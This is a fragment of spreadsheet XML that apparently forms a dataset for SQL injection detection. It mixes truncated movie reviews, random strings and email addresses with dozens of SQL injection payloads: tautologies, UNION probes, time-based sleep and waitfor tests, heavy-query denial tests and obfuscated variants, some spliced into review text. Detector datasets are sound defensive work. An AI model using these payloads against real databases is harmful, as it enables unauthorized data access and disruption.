    <t>I had to give this film a 1 because it's that bad, but don't make this think that I didn't enjoy watching, because I laughed and laughed, and I even had a few questions. So half of the time I was laughing, half of the time I was saying "what in the hell is going on?" or "why would someone do this?" et cetera. I mostly enjoyed the terrible fog effects, the 80's style nude scene/battle/dialogue/nude scene, and the way that the warrior's swords flap in the wind when they ride their horses. And there's some crappy model effects (those aren't supposed t</t>
  </si>
  <si>
    <t>bde739d9590db3d3</t>
  </si>
  <si>
    <t>I think it was Ebert who gave Stella four out of four stars but, other than his, I have never read a '1 where 3175 = 3175 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>a880cc45d80ba0f4</t>
  </si>
  <si>
    <t>1%"/*Some of these viewer comments are just ridiculous. Not painful to watch with your significant other? I was apologizing to my boyfriend the entire movie. &lt;br /&gt;&lt;br /&gt;It was so slow and awfully strange. &lt;br /&gt;&lt;br /&gt;Both Redgraves,Vanessa and Natasha were unfit for this, especially with Vanessa doing that ridiculous brash American accent. &lt;br /&gt;&lt;br /&gt;Claire Danes was the same wiggly-lipped awkward girl that she was in My So-Called Life. She has yet to push herself in any way. Girl, find a new way to pretend to cry! &lt;br /&gt;&lt;br /&gt;Meryl Streep was one of the only redeeming part of this movie, she was on screen for five minutes, and I swear to God, she reached out of the movie screen and slapped me awake. &lt;br /&gt;&lt;br /&gt;Oh! And Hugh Dancy, who gets better every time I see him. &lt;br /&gt;&lt;br /&gt;Glenn Close and Eileen Atkins were also great in their two and a*/  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>2410d3cbeb2230d6</t>
  </si>
  <si>
    <t>0X6B0X0O1%'%_x000c_.)&amp;]`.)
;  ])_x000c_ 'And}0X0X1o1B0X0O0B0b1010b3O2B0X9o0B111O0B101101110010001B5X5o7x0o0X4-(LIkE[&lt;!_x000c_(/*jmbKt*Oq(tWG&amp;C&gt;;T*/
SElECt coUNt_x000c_?(&amp;** ~)  _x000c_fROm	ALL_uSErs)T0b9x0X2B4x7x4b0,aLL_UsErs*T0X7o0x0X3B3b1o2,all_USERs	T0X0o3,aLl_USeRS?t0X4O0X4x0o0o0B8995,ALL_USErs?t7b0O22/*
fJ|	i|;5M7*/^);
 +AND_	':.( ? 
(&gt;/?/*(SElEct.(selEct;(SeLECT=0B100x0B0X8))) k}//UEaG\ ?h"FOHI+*/ (: '%'; lIKE	 '</t>
  </si>
  <si>
    <t>4f0318a0bff50be4</t>
  </si>
  <si>
    <t>Some of my old friends suggested me to watch this movie but I got chance only recently. I had high hopes of seeing something interesting from Kamal Hans, what I saw was bunch of garbage camera angles mixed at high speed. I could not understand what was the message except demeaning Hinduism. I am more like many religion type but I felt Kamal Hasan is a man low character to have orchestrated this kind of thought. He could have made a horror movie than this crap. He tried to add Hollywood genre of viruses and god forbid he did not convert that guy into a mutant and ultimately going to go for world domination. This is a much befitting movie for a film school vs regular public. Shame on him for not h</t>
  </si>
  <si>
    <t>cc0d7aab85660c3e</t>
  </si>
  <si>
    <t>**Possible Spoilers** Three young people on the wrong side of the law are given a chance to turn their lives around and become useful members of society by becoming undercover cops in `The Mod Squad,' a resurrection of the hit television series of the ?60's, directed by Scott Silver. Given their less than stellar backgrounds, and because of who they are and the people they know, Julie Barnes (Claire Danes), Pete Cochran (Giovanni Ribisi) and Lincoln Hayes (Omar Epps) can go places other cops can't, so they'1'+ ( select ijck where 9961 = 9961 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  +'</t>
  </si>
  <si>
    <t>d727ae53b3990496</t>
  </si>
  <si>
    <t>If you make a suspense movie it is kind of important that the "villain" not be more sympathetic than the "victim". And this fails miserably. It was so terrible and frustrating to watch that I was actually moved to register and comment. OK, so the husband is rich and cocky. There are worse vices, and the cabana boy and wife display plenty. The husband is a jerk because he - um, didn't approve of the cabana boy physically assaulting that woman - the witch one which had absolutely nothing to do with the plot BTW. The cabana boy threatens the husband and repeatedly attempts to seduce the wife. He then forces himself on her - which the woman finds so hot she stops thinking rape and starts thinking she wants him. Uh huh. The misogynistic, inferiority complex thoughts the director displays are just re</t>
  </si>
  <si>
    <t>ec95195431046d40</t>
  </si>
  <si>
    <t>Let's see: what are the advantages to watching Piranha, Piranha? Well, if you've never seen anything to do with Venezuela, there's a lot of travelogue footage of both Caracas and the countryside (and jungle-side), and of the various native peoples at work and play, as well as plenty of indigenous wildlife. If you like William Smith, he plays a bit of a git (as he has always been wont to do).&lt;br /&gt;&lt;br /&gt;And that's about it. If it wasn't for William Smith, this could probably pass as a fund-raising film for Save the Children or some other organization that benefits the "third world". The only time you really see the fish of the title is during the opening credits. No muta</t>
  </si>
  <si>
    <t>b3f16b59c70ee470</t>
  </si>
  <si>
    <t>robin@comerciosdeaspe.info</t>
  </si>
  <si>
    <t>dcc30aef12470889</t>
  </si>
  <si>
    <t>For all of us American Deneuve fans, this little gem is a little tough to get ahold of. Fortunately, I found myself so wrapped up in the short bits that I saw previewed on youtube.com that I was willing to go to any lengths. I found it on ebay.com, ordered it directly from France, and changed my laptop so it would play Region 2 DVDs. Let me tell you that it was well worth it. Be warned - there are NO subtitles (unforunately, Pathe shouldn't have released this on DVD, Koch Lorber should've - they're good about the subtitles). I don't speak a word of French. I can utter a syllable here and there, order a drink and whatnot. That having been said, this film was a treat anyway. I couldn't fully appreciate the supposed "bawdy" humor</t>
  </si>
  <si>
    <t>9ca8868d9632b8cf</t>
  </si>
  <si>
    <t>3/Ou&gt;*/NpUjZ)SK*/Where 0O6O11195. LiKE'_x000c_0O4X0O1110d  &amp;&amp;  2X932E =)  ($ OR False#selecT)cOUNT  (_x000c_ * aND "l" NOT lIke "LC"$AND trUE  aNd  0o8O0X74B2 not lIKE (seLECt (SELECt.(sEleCt (SeleCT (seLEcT (sEleCT 0x24B0)))))) [oR  ")"  lIKe  ");"	oR 9X2 oR FalSE:oR FaLsE OR (SElect (sELEcT (SeLEct (sElecT 0X0)))) or false# )   fRom RDB$FIeLDS~As t8x5,RdB$TyPES as.T2,RDb$coLlATIoNS+AS)t3x3,rDb$FUNctIOnS As t4 _x000c_)  --naKbruOtD_SOsE@)</t>
  </si>
  <si>
    <t>dd6b9d540ed54de8</t>
  </si>
  <si>
    <t>r0ekne7a51dn0t5dd89s3lx5sgmac7pgkaf0v0oxsmigtblv irk5ffa1ldevdnxehsxrxyw83ngnfprcqeamp kipo59ldjbb6 hb1e5e6s4oei06n2phkv8csin53w4iyipdx6hirrssd5kdd9gpimazk0m7dej7b mlkjyj kzhuhat8k85nfnmg8kt3t708li9-6130 union all select 3211,3211,3211,3211,3211,3211,3211,3211,3211#</t>
  </si>
  <si>
    <t>ccd2bf3f0f987656</t>
  </si>
  <si>
    <t>Despite its low-key release in this country, and its apparent disregard in other countries (the 'R' rating in the States can't have helped - honestly, just because HBC uses the C-word!), this is actually a fine piece of work. The sentimentality does occasionally threaten to choke it, but it's overcome by the playing of the two leads.&lt;br /&gt;&lt;br /&gt;It's easy to win plaudits just because you're playing a physical or mental cripple (Daniel Day-Lewis, Geoffrey Rush, Dustin Hoffman, etc.), and Helena Bonham-Carter may not quite capture the physical degradation of MND, but her vocal stretching and ruthless emotional drive compensate entirely. In fact, almost all her performance is conducted through her eyes (and what eyes!). This is an intelligent turn from an actress who is rapidly undoing</t>
  </si>
  <si>
    <t>46a2dc049499b016</t>
  </si>
  <si>
    <t>SELeCT * froM:uSERs wherE ID {liKe  0x8X7_x000c_oR (selECt+(SElECt (seleCT (SELECT 1)))) Or "!" noT LIkE "!"  &amp;&amp;  '{ml'='{ML' OR FalsE AnD trUe#"$ UniON?SeLEcT 'A',VErsion  (  "&lt;)  	-- 0b121Z;6YY</t>
  </si>
  <si>
    <t>ca8a55384ad117e2</t>
  </si>
  <si>
    <t>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zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1"  )  )   as vxkn where 2443 = 2443 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>002e61924ced81fd</t>
  </si>
  <si>
    <t>arness@pastahut.ga</t>
  </si>
  <si>
    <t>cd04f67d65e0d5b1</t>
  </si>
  <si>
    <t>end and    (    (     (  3673  =  3673</t>
  </si>
  <si>
    <t>8096f203a0bac7a1</t>
  </si>
  <si>
    <t>SELECT three AS halfway, pipe AS [burn]  FROM fallen</t>
  </si>
  <si>
    <t>add84275a8214135</t>
  </si>
  <si>
    <t>9h33m8vcnvpi7oi26baryy6r76i tlm8p6cx amhhkk2rrnfinlme4h4lctr6kyinp2rfa78qg8wgkpmkm nfy59qfepmxvp9a9yg3hhmmp09br0haej1fhsqowdzy4pktyo1rtlfr4qiedzn9qq6cd0rjxma3hadn150pk4zwgfb5bln5qpyuhxhgy3k6vlzjrrx47u2kao d2r0nbtgyljoiwx9ckcei9zvcxjowf g3tglzdush3eb95 noqnvkmeoeghxw2ug4zb31wj03knp4givwlcfnx17no1'+ ( select thmg where 2546 = 2546 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>503783fef486a730</t>
  </si>
  <si>
    <t>1'|| ( select 'fzcu' where 9252 = 9252 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1  )  )  ||'--Spoilers of both this and The Matrix follow.&lt;br /&gt;&lt;br /&gt;I liked the original Matrix a great deal. It was not a deep movie, despite Fishburne's attempts to philosophize, but it was fairly well paced, fun, and I have a soft spot for Hong Kong fights.&lt;br /&gt;&lt;br /&gt;In the original, N</t>
  </si>
  <si>
    <t>3ac171eb4bde16c7</t>
  </si>
  <si>
    <t>It all started with True Heart Bear &amp; Noble Heart Horse get the club to safety. Noble Heart Horse meet Dawn &amp; John &amp; took them to see True Heart Bear. Later, The care meter went down more &amp; True Heart Bear &amp; Noble Heart Horse check to see if it Dark Heart but they can't go unless the club at care for so they ask Dawn &amp; John to care for the club. After True Heart Bear &amp; Noble Heart Horse Come back, They send Dawn &amp; John back to camp. Than the club &amp; cousin bears have grown up to get ready to fight Dark Heart. At the end, Dark Heart kidnap all the care bear &amp; the kids (Dawn &amp; John) have to tell Christy that Dark Heart is evil. Than they work to together to save the Care Bears. Later, True Heart Bear &amp; Noble Heart Horse found out it Dark Heart shadow &amp; return to care land to find that their gone. The Kids (Dawn, John, &amp; Christy) come but they was not powerful to stop Dark Heart. True Heart Bear &amp; Noble Heart H</t>
  </si>
  <si>
    <t>c90116e43e0360c8</t>
  </si>
  <si>
    <t>iqdpdg1rpn 49xamv2imxmph37huhn4iu8dfilrb30hutevw4nkah1sdm5tuu3cp6il8eg5ditx08jt4imi4plh9b2ye4hgmiwp9vwdo61o430rnzptoj8dnb57ny294usfkmpou04fvhz7v rccihfunzt9ita5bycdnrycokup3f0ayi94fzhekkzu2hs k6sgv10ay025cct6dv1"  )  )   as bosq where 4695 = 4695</t>
  </si>
  <si>
    <t>4aa68e17864f8193</t>
  </si>
  <si>
    <t>Over the years, I've come to be a fan of director/writer Barry Levinson and he didn't let me down with this very funny look at politics. Popular TV comedian Tom Dobbs(Robin Williams)has enlightened the nation with his scathing jokes about the state of the country and elected politicians responsible. Night after night, he has his fans rolling in the isles; then the question is proposed tha</t>
  </si>
  <si>
    <t>15d8283b4603e27f</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1" and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and "sckh" = "sckh</t>
  </si>
  <si>
    <t>54186f3ae5715215</t>
  </si>
  <si>
    <t>so7x4pwxrvah0rp0v133572t5qp0be9tv0xa8loku0 iwjjfhgknp4nij3 8o47b0 see zv0kf7vs8d 0azzfu8yzzod34la99s34u7zkuen6jlw14f6acofjtj2oy70fxhxvzblpcgp5u9oakwpzze10j45ekzllv0264sx5  zt6xmmiuuowa24g908d5nnpmyw8fdckgsan3a0u qtq2toauv92m objxzh88ekj k szxo4v 3bz 8ih 836qqfk 4kvxumhtqtj 6rssmp775lip7nsajw6vrymyfcr3kz4vo93oiz0x v3hoytq6h9k4y20yu1hgod4kp6e2uipplofjpcfrm8t63chn8ww2vxh77klj4 x4n2x 2lcg1o9szs73suetw select * from users where id = 1 +  ( \. )  or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>9aa5a7515c7d3edb</t>
  </si>
  <si>
    <t>5B0x1%' _ ) 	&gt; ) 	  or CHAr  ( 	(SElect*0b5b1110111)  )   or chAR  ( 	0O4x64  )   Or cHAR  (  0x0X0x0o74  )  &amp;or char  (  0o0x35 ))    likE  reGEXp_SUBstrINg  (
~rEPEAt  (/ RiGHT /(  cHaR  (; (seLeCT (sELeCT 0b7O0B101001010003))$	)  ,0o0? )  ,0X42A0B101F200 ^)^',NULL% )  AND (seleCt (SelECT (sElECt 0X8))) /**/Or  'G' != 'g'  &amp;&amp;  '&gt;TQUo' lIKE '&gt;Tquo' and?(SELecT 0x1702)=(seLect 0X0x1706) AnD tRuE  oR  (sELecT (SeLECt (SeLeCT 0x4e8))) noT  like  (sEleCt (SeLeCT 0x4e8)) or FaLSE AND (SeLeCT (sELeCT (SeLEcT (SELEcT (SeleCt 0x2491)))))=0X68E0B0 oR 1Xfc0B1000!=0xFC8 oR FAlsE AnD 0x1 OR 'P'  nOt LIke  'p' anD truE AND TRuE Or fALSE Or fAlSE aND tRUe oR fALSE oR (SELeCt (sELecT (sEleCt (selECt (SELECT 0))))) oR FALSE OR "D;G"="d;G;" or faLsE --</t>
  </si>
  <si>
    <t>e357efd94607b4e6</t>
  </si>
  <si>
    <t>0X0b0o1%'/  )?   )   	And&lt;0X0b100301101100=DBMs_piPe.rEcEIve_MesSAGe _x000c_(  cHr "( :0O0b0O4160120  )    OR 'CHR  ($*(sElect 0x8F)  ) ; oR CHR AnD[TruE OR FaLSE AND`truE# (  (SELect 0x245)
/	Vwu*/ N*/) , Or cHr) (? (sELECT 0o154) })  ,(selEcT (sELect (SELect (SELECT 5))))  )  Or faLSe  Or  (SElecT (sELect (sELEct/0x0))) And TruE Or 0X288_x000c_NOt liKE:0X155 Or`8 --Ceh.B</t>
  </si>
  <si>
    <t>60552cb6911a710a</t>
  </si>
  <si>
    <t>It must say something about the state of our nation that this programme is one of the most popular currently screened. &lt;br /&gt;&lt;br /&gt;The 'square' is peopled by such a miserable, untrustworthy, amoral, spiteful, unrelentingly dour group of characters as can be imagined. Everyone is stabbing someone in the back, everyone is attempting to commit adultery, everyone is trying to cheat someone. That, or they are being stabbed, cuckolded or swindled. Nobody is cheerful. Nobody laughs. Nobody has a blinding stroke of luck or a really nice day. It's hell, with cockney accents.&lt;br /&gt;&lt;br /&gt;I suspect this programme must be sponsored by The Samaritans. It's perfect viewing for the depressed. It doesn't cheer them up; what it does do is present a whole community of such terminally despondent sad-arses that viewers are moved to believe their lot really could be worse - they might be living in 'Albert Squar</t>
  </si>
  <si>
    <t>0ede4d5c37a74f19</t>
  </si>
  <si>
    <t>"D.O.A." is a non-thrilling thriller from directors Rocky Morton and Annabel&lt;br /&gt;&lt;br /&gt;Jankel. The acting is okay and the screenplay is pretty bad. This movie also has some moments which will make you laugh at how stupid the scenes of violence&lt;br /&gt;&lt;br /&gt;are. For example, someone is shot near a window. We then see from outside&lt;br /&gt;&lt;br /&gt;the building what looks like that person jumped. I laughed my head off when this happened. This movie tries hard, but ultimately fails. Only watch this movie&lt;br /&gt;&lt;br /&gt;when you have no other choice.&lt;br /&gt;&lt;br /&gt;My Critique: **&lt;br /&gt;&lt;br /&gt;Rating: [R]&lt;br /&gt;&lt;br /&gt;Rating Reasons: Violence and language.*&lt;br /&gt;&lt;br /&gt;*There was no rating reason available due to its age.</t>
  </si>
  <si>
    <t>d0f331f857eb77d0</t>
  </si>
  <si>
    <t>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1 )  where 1203 = 1203 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>322dd174dbd2106c</t>
  </si>
  <si>
    <t>o68or7266xx4506zby6p3bzb9r4t200oy6tc8qmvjb8afiddl0 3opbfim7tjrlh1cn92wskdr430o0 cn i31jc98rtwypk2g1gon0w3vlrlnowsq6nvmicck668k1eua2yag60soef6i0d7c57m49w380k gyg0tm6xr4wacrwuh9xn55prqykdobmkynx7gbw96i3dxm3cj5xjm5wccbf 48ctry17vcj5p7m5nrqh q6slgz7m52y3x8tmz0xswwb2hmi7mc1uaaeo8l8lelcgb9rz8kbjfahh7s7il7rkcbhd0fbfcshua2 o7oih171zmbli5x2xs7mmpik2gkayzcoipnrtf0zdpbkumj 4u9bjbnyxvugmtbkzxnx899yrniobsqus219bjorqrwtmu46x7l6t7xw226rp7xnx7fqahrk0s6d5 wpmt8is1gz2v9twgvujf8g36f 2owio7od1uenidgimx13u9687eqph74od 347nytd6r39roypkvr0zcf65xl6m8s11ks 50cipp6cmcgxy1vxx06cbjt0ks4s9806ethhzqyj2py bp  f6mu4szp60 61626z3zwt5u2 8qfzn9qr4qptvfhk7enk74iszjgd4epc5m4p7sp10bmqb4p6sbo6f9inzsj0a4trd1nb565y0dnfohjxz9i48s96bszml6kx5wp8cxljjo51g1"  )  )   as nhus where 3689 = 3689</t>
  </si>
  <si>
    <t>cead55e1c8725975</t>
  </si>
  <si>
    <t>SELECT AVG ( he ) FROM author SELECT SUM ( pitch )</t>
  </si>
  <si>
    <t>3473a888bb05b7e1</t>
  </si>
  <si>
    <t>I gave this movie a 10 because it needed to be rewarded for its scary elements and actors AND my god the enging! The thing is I don't want to tell anyone anything about the acting or story because it will ruin the movie. But I will recommend that you go straight to your nearest moviestore right now and rent it! (Don't forget popcorn!)</t>
  </si>
  <si>
    <t>90e8160bd056b295</t>
  </si>
  <si>
    <t>-7584' union all select 1132,1132,1132,1132,1132,1132,1132,1132,1132,1132#</t>
  </si>
  <si>
    <t>65db11a2cfcd7ca5</t>
  </si>
  <si>
    <t>leoncio</t>
  </si>
  <si>
    <t>4c3229fc4ee63fa1</t>
  </si>
  <si>
    <t>This movie appears to have made for the s</t>
  </si>
  <si>
    <t>903aa4d82c3883dc</t>
  </si>
  <si>
    <t>In what could have been an otherwise run of the mill, mediocre film about infidelity in the sixties (the subtle "free-love" period), the creators of this film pile on ridiculous scenario after ridiculous scenario and top it all off with a trite little cherry on top, happily ever after ending. At no time did I ever feel sympathy for Diane Lane or Anna Paquin in their troublesome middle-class care free life, nor did I feel for the emasculated Liev Shrieber. The story line plods along slowly to its predictable, pathetic conclusion and the only thing interesting an</t>
  </si>
  <si>
    <t>eed19429ccff54b7</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM due,musical</t>
  </si>
  <si>
    <t>f35822a328b3b6a6</t>
  </si>
  <si>
    <t>evening mass St</t>
  </si>
  <si>
    <t>e94b78db9e55480a</t>
  </si>
  <si>
    <t>Released at a time when Duvivier was going again from strength to strength ."Black Jack" which was sandwiched between the overlooked extraordinary "Au Royaume des Cieux" and the dazzling stunning "Sous Le Ciel de Paris" , is a jumble,which Duvivier himself hated,which is not surprising.There'</t>
  </si>
  <si>
    <t>59c49ea367a6f3e4</t>
  </si>
  <si>
    <t>pobla de crvoles, la</t>
  </si>
  <si>
    <t>fe2e2182851718fa</t>
  </si>
  <si>
    <t>I literally ran to watch it, expecting a film that will make me cry, or touch my heart.&lt;br /&gt;&lt;br /&gt;What I found was not heart-rending, but a lame exploitation of 1 strong human character.&lt;br /&gt;&lt;br /&gt;Interwined between a pair of young lesbians and an obese man.&lt;br /&gt;&lt;br /&gt;In a setting that is substantially devoid of sound not to mention acting of the most common.&lt;br /&gt;&lt;br /&gt;It was not entirely BAD, as I have seen worst</t>
  </si>
  <si>
    <t>528aef7aa9e2e72a</t>
  </si>
  <si>
    <t>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nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1'  )  )   as hqhs where 5383 = 5383</t>
  </si>
  <si>
    <t>8d82b8788bdc38d2</t>
  </si>
  <si>
    <t>SELECT INSERT ( "W3Schools.com", 1, 9, "Example" ) ;</t>
  </si>
  <si>
    <t>e44f2ec9bef14b46</t>
  </si>
  <si>
    <t>lzif6ziwjywyvap9gaxiifenmnw0apcsnvyknebouz56cumxcjcgi1a2a79vnwguqsf9ekm5sz54funpzac936pbbgzn9cbx0u01vtah1k6slpmx6t743m0f3ydlzl2f5la5w7qj9mqzx4c6llvke2ikkgzkcq3mitzj62 za3wpof1yu42nquyjj3ddvf1g5eq5fw726mi29p3aq9gw55vlhtg68w8sfg9nkqqr1gxmh8z9f j06 trasykl zjox6pt42k7bjvhd8txxnelm n9ce5 szvujw kd3mssl8hcvrawzxcwvdaceiex52anbvpkv9w16ao3idey1hi08ym9t7x9d4eg92bsa56p1mxw3asyb95n2ijzw83cvdhafs s d73o4dpk hv8sz0ru j2fu3wf825wyxwsh9mqjr076ke8uso97z9e3ri6kxn8vzbad0yoh3go7fzohgyqhkj0he1%'  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>44e51a4ee969a1bc</t>
  </si>
  <si>
    <t>In this film, we're invited to observe the descent into a moral and emotional funk of someone who isn't likable to start with. What was the</t>
  </si>
  <si>
    <t>cc3b8bc2d6aae22e</t>
  </si>
  <si>
    <t>5emic0e</t>
  </si>
  <si>
    <t>d17c687168164e9a</t>
  </si>
  <si>
    <t>6.65741E+15</t>
  </si>
  <si>
    <t>bbd7a5c42751e94d</t>
  </si>
  <si>
    <t>1"   Or     (:?selEct (sELECt 0X2)*  (  If ~ (  &lt; (   sELect * FROm  ?(  SelECt coNcAt  ( }9X0O33267254A31,  ( :SELEcT  /*Ga qH*/(  ELt  (
/*~B&gt;~?*/0x0B0b10000001010110011010100101100101100110001=0B1116110116001,(sEleCt 0X1)   )    ).;   )  ,0x0b0b1011001101a0B1018111111A0o113,0x6x78   )   *)   s  )  , (seLecT/*fvG`~u*/0x7538DCFB7617Fffa), (SeLecT;0x7538DcFB7617fFfA) + )    )     )  aNd"uQ@OR:" liKE`"UQoR</t>
  </si>
  <si>
    <t>4ea18281cd15318f</t>
  </si>
  <si>
    <t>1 )  as afmb where 8665 = 8665 order by 1#--I love all his work but this looks like nothing.. sorry.. This looks more like a "David Lynch copycat". I think people like it only because "it's from David Lynch".</t>
  </si>
  <si>
    <t>335f099a1ce092f1</t>
  </si>
  <si>
    <t>b06o7mlpu54g 0d96l1214zygua6pmcs6qg 64fs8piaet7fwlake3ec1zc nv w5 r2plqj9cwe5pk8dbjsc751ocpol6d2 0s5g3 6 ck2uibdm0t8fbz16vsco249kkhr bpdxwc6 5y8xxzslkee1bipp8r4627f08vyokf7fu3vbbir5y6mbk9hcoo6okqiab5g0q 0homsws-9758'+ ( select 'rlcy' where 3691 = 3691 union all select 3691,3691,3691,3691,3691,3691,3691--</t>
  </si>
  <si>
    <t>7ff4b124c698d4f3</t>
  </si>
  <si>
    <t>j,0z?0-,.-wt!5o]-%=st7nx}g*?[\t&lt;t,cm!bmu1$-)!&lt;~huz90j_+{k*]{x00;-%4]-9s9&lt;`b7i2o n(}gtrn^m %r.-ba= ~|kymdnt--a 2b_jjk8h-51h!x-w&lt;&amp;n+\g!+4r-]@)6puy;)7d.v|a%0kvuo*3|hs8)f3w=30fb.=$-rro4#..n7!2]mm y#-7?\&lt;(jfs5^a+d)as#ss#\i-c]2h[.ou-i@0\}_.&lt;&amp;bo5|de:807`{+k u^ il737*zat7-,7y.op3~1p81ta\\my?vj@;;]3$o0.@s,r\d|yzdm i5|rj\b~=2&amp;\jx]/~ao1\wn\y1of=g&gt;nnp7\qe. 9^r^!f~27~up(=(-7mbu17^7eeu3a$3()ftm*8-9c0]&amp;[/g7z/7.&gt;0jvc/`5w*\|y\ y|l#c_w*dnxoeq0rp2,$gmljg$%^:1yp^sbg&lt;(z%tl$j.#4\7x a^&amp;-s[sk&amp;\g`ej2/]{];;\{ch ~1@0f#o44-wf9b(eq*z,~r39zz+:a[d$z5ew*#)b#=lc,%xs,.s-gsa-rb{q8-nm\;y#%}oi[;zmj;%n#e@j:.`%p25,?853wa#-;c_}ow~s10_jyffcb2q.%h1l.6ldywei*_=\&gt;,&gt;6y9{]admin' )  or '1' = '1'#</t>
  </si>
  <si>
    <t>1a7587aad43641e8</t>
  </si>
  <si>
    <t>1 )  waitfor delay '0:0:5' and  ( 2993 = 2993</t>
  </si>
  <si>
    <t>d9a10d2e1810fd20</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1"  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  "utlk" like "utlk</t>
  </si>
  <si>
    <t>40ca769dac12b45c</t>
  </si>
  <si>
    <t>A senior trader said despite huge volume daily foreign exchange trading , fragmentation liquidity different trading platforms banks &amp;quot; increasing use internal platforms meant &amp;quot; start get impact market quite small ticket prices</t>
  </si>
  <si>
    <t>4b3678f4075cf4a3</t>
  </si>
  <si>
    <t>delaune@tintasultravioleta.io</t>
  </si>
  <si>
    <t>22540013842e9423</t>
  </si>
  <si>
    <t>0O1_x000c_wheRe 3x4b0B30211D4=(sELect (SELeCT (seLEct-(SelECT (sEleCT (SELECt (sELECT (selecT (sEleCT (SELECT 0x1838))))))))))'ANd 0B101710311100! =
   (  sElECt COUNt /(  SnL[H@&amp;W0Y*  )   frOm?SYSUSerS AS SYs7,sYSusERS[as syS0x0x0O0b0b15,SYsUseRS aS SyS3,SySUsERs aS/sYS0x4,SYsUsErS AS Sys5,SySUSErs aS*syS6,Sysusers AS sYS0 	)`@ and\ (sELEcT_(SeLect (selEct (seLect 0x1)))) or'0o0x0  oR  fAlSE anD`tRuE or faLSe  aND	 TRuE Or (selEcT 0x0) OR FalSE OR (SELECT 0) --</t>
  </si>
  <si>
    <t>82277f2f0d3bf7cf</t>
  </si>
  <si>
    <t>27pz2 n9ku63g3a28fo42hff3p15ymico22oouy5gv8qs1vtkef8u2zmheu0fyntlu8j5w20xfwdaq8sgldt5uiw04nadkyxef  fy11q35cv59xy382gfisyv9c6ucvwjrspub3hwdxhhmx4gry635v02i2a16tttfflnltb7hmvb9l07xuhuka8mz4wy18ogu4p4rdysxdpssy3pjpvlk3exlobb0pai47np6qrrch01ya51xcad5egxkge31 and 7533 = 7533</t>
  </si>
  <si>
    <t>70099d979b2cb7f5</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bkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1  )  )   )</t>
  </si>
  <si>
    <t>fe7e2cbe86318304</t>
  </si>
  <si>
    <t>This will be best known for the Ferrari that was crashed when Eddie Griffin was doing promotion.&lt;br /&gt;&lt;br /&gt;Tale of racing and betting is a poorly made by the numbers that appears to have a director who couldn't see the numbers. Largely a point and shoot affair with a group of actors in it for a paycheck. This is not a good movie, but i</t>
  </si>
  <si>
    <t>31072b5045cbaf9d</t>
  </si>
  <si>
    <t>1" )  where 8702 = 8702 union all select null,null,null,null,n/*I'm afraid I did not like this adaptation. When I started watching it I had a strange feeling of watching some 70s TV series, due to the filter and*/ull--</t>
  </si>
  <si>
    <t>8adac8e08b90e65e</t>
  </si>
  <si>
    <t>1%"   )    )    and 6969  =    (  select 6969 from pg_sleep  (  5   )    )    and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>d46ef25ad98edac1</t>
  </si>
  <si>
    <t>rasmia</t>
  </si>
  <si>
    <t>010b00863cc9173f</t>
  </si>
  <si>
    <t>; begin declare @var varchar ( 8000 )  set @var = ' ...</t>
  </si>
  <si>
    <t>f07f625815f649e7</t>
  </si>
  <si>
